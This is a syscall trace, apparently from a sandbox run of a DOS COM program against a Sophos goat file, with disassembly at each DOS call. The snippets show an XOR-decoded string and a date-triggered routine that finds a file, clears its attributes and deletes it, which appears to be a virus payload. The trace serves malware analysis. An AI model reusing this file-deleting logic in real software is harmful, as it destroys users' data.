.
| Time | Syscall Op | Syscall Name |
|---|---|---|
| 2018-12-17T22:04:51.380808301Z | 44 | PC: 13e66 | Get time 0x13e66: mov byte ptr ds:[bp + 0x10e], dl 0x13e6b: mov byte ptr ds:[bp + 0x10c], dl 0x13e70: mov byte ptr ds:[bp + 0x103], dl 0x13e75: mov byte ptr ds:[bp + 0x104], dl 0x13e7a: mov byte ptr ds:[bp + 0x105], dl 0x13e7f: mov byte ptr ds:[bp + 0x106], dl 0x13e84: mov byte ptr ds:[bp + 0x107], dl 0x13e89: mov byte ptr ds:[bp + 0x108], dl 0x13e8e: mov byte ptr ds:[bp + 0x109], dl 0x13e93: mov byte ptr ds:[bp + 0x10a], dl 0x13e98: lea si, word ptr [bp + 0x354] 0x13e9c: mov cx, 0x2d2 0x13e9f: mov al, byte ptr ds:[bp + 0x34b] 0x13ea4: xor byte ptr [si], al 0x13ea6: inc si 0x13ea7: loop 0x13ea4 0x13ea9: mov ah, 0x2a 0x13eab: int 0x21 0x13ead: cmp cx, 0x7ce 0x13eb1: jg 0x13eba |
| 2018-12-17T22:04:51.383583295Z | 42 | PC: 13ead | Get date 0x13ead: cmp cx, 0x7ce 0x13eb1: jg 0x13eba 0x13eb3: cmp dh, 3 0x13eb6: jg 0x13eba 0x13eb8: jmp 0x13f2e 0x13eba: mov ah, 0x4e 0x13ebc: lea dx, word ptr [bp + 0x3a6] 0x13ec0: mov cx, 0 0x13ec3: int 0x21 0x13ec5: jb 0x13edd 0x13ec7: mov ax, 0x4301 0x13eca: xor cx, cx 0x13ecc: mov dx, 0x9e 0x13ecf: int 0x21 0x13ed1: mov ah, 0x41 0x13ed3: int 0x21 0x13ed5: mov ah, 9 0x13ed7: lea dx, word ptr [bp + 0x354] 0x13edb: int 0x21 0x13edd: mov ax, 0x304b |
| 2018-12-17T22:04:51.38639111Z | 78 | PC: 13ec5 | Find first file |
| 2018-12-17T22:04:51.390554739Z | 48 | PC: 13ee2 | Get DOS version |
| 2018-12-17T22:04:51.392673437Z | 53 | PC: 13ef1 | Get interrupt vector (Interrupt = '33' AKA 'Random read') |
| 2018-12-17T22:04:51.39444131Z | 9 | PC: 12a85 | Display string (String= 'Sophos Ltd, Oxford sacrificial COM goat 1400H bytes long ') |
| 2018-12-17T22:04:51.399924777Z | 0 | PC: 12a89 | Program terminate |